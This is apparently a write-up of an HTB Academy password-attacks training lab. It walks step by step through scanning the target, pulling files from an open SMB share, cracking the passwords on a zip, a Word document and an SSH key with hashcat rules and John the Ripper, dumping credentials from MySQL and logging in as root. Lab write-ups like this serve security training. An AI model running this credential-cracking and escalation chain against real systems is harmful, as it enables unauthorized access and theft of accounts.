Lab - Medium

Hello, everyone. Today, we will be exploring the Medium-level Password Attacks Walkthrough lab from the HTB Academy Penetration Testing Course. Our goal is to obtain the contents of flag.txt in /root/.

First, we will scan the target IP to identify open ports and assess the available options.

nmap -sC -sV 10.129.223.102

We have three open ports (22, 139, 445). Let's list the SMB shares available on the server.

smbclient -N -L \\\\10.129.223.102\\

Let's review the contents of the SHAREDRIVE share.

smbclient //10.129.223.102/SHAREDRIVE

Next, let's apply the rules from custom.rule to each word in password.list and save the mutated versions in mut_password.list.

hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list

Then, let's extract a crackable hash from the "Docs.zip" file obtained from the SMB server and run it through our mutated wordlist.

zip2john Docs.zip > zip.hash
john --wordlist=mut_password.list zip.hash

We have obtained the password for the file "Docs.zip". Let's use it to extract the contents.

unzip Docs.zip

I've received a file named Documentation.docx. Let's examine it to determine the information it contains.

I attempted to open the file, but it is password-protected. Let's proceed with cracking it.

/usr/share/john/office2john.py Documentation.docx > docs.hash
john --wordlist=mut_password.list docs.hash

We now have the password. Let's proceed by opening the Documentation.docx file to review its contents.

The document contains the password for the user "jason". Let's attempt to connect via SSH using these credentials.

ssh jason@10.129.223.102

We have successfully established an SSH connection using the user account "jason".

I investigated and found that port 3306 is open locally, which is the default port for MySQL. Let's attempt to connect to the MySQL server using Jason's credentials again.

mysql -ujason -p

Let's analyze the databases to determine what information we can extract.

show databases;
use users;
show tables;
select * from creds where name = 'dennis';

During the investigation, I discovered an additional username, "dennis," and obtained the associated password from the MySQL server.

Let's use these credentials to log in as the user "dennis".

su dennis

I conducted an extensive investigation to locate the flag and discovered a hint indicating that useful files might be available in the home directory of one of the users.

Let's proceed by obtaining the SSH private key of the user dennis.

cd .ssh
cat id_rsa

Let's copy the content of id_rsa to a file on our attacking machine and adjust its permissions so that SSH will accept it. Before using it, we first need to recover the key's passphrase.

nano id_rsa
ssh2john id_rsa > ssh.hash

First, we extract the hash from the SSH private key file (id_rsa) so that it can be cracked with John the Ripper.

john --wordlist=mut_password.list ssh.hash

Here we have obtained the passphrase. Let's update the file permissions and try the key against the root account to verify whether it works.

ssh -i id_rsa root@10.129.223.102

Now we can get the flag.
